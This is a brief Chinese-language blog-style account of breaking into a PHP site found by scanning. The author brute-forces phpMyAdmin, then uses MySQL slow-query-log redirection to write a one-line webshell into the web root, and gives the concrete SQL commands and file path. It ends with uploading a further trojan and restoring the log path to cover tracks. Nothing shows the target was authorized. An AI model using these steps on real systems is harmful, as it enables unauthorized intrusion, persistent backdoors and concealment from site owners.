背景：

某日、扫描到的一个地址，打开页面一个hello world，一看网站PHP的，怀疑是装了个PHPstudy或者xampp等这种全家桶

实战

扫一波目录看看

发现了一堆好东西，直接先看看PHPmyadmin能不能进得去，这个是最关键的，尝试使用默认口令 root/root无法进去，开始爆破一下看看，发现直接爆出来了，那就不用再www.zip中看了。

爆破成功，就很OK，就很棒，成功登陆

然后确认网站绝对路径

查看是否可以导出文件

发现是不行的。。。那我们就开启慢日志查询，将日志文件给改一改。

SHOW VARIABLES LIKE '%slow_query_log%'  查看现在的日志文件位置

D:\MySql\Database\WIN-O2RKMNRN8K0-slow.log 记住了，一会马儿传上去了要记得改回来，不然你懂得

开启慢日志查询

set global slow_query_log=1;

修改日志文件位置：

set global slow_query_log_file=’E:/phpStudy/PHPTutorial/WWW/expect-snap.php’; 

确认一下

接下来写入一句话

接下来，上传个新马，恢复日志文件，收工。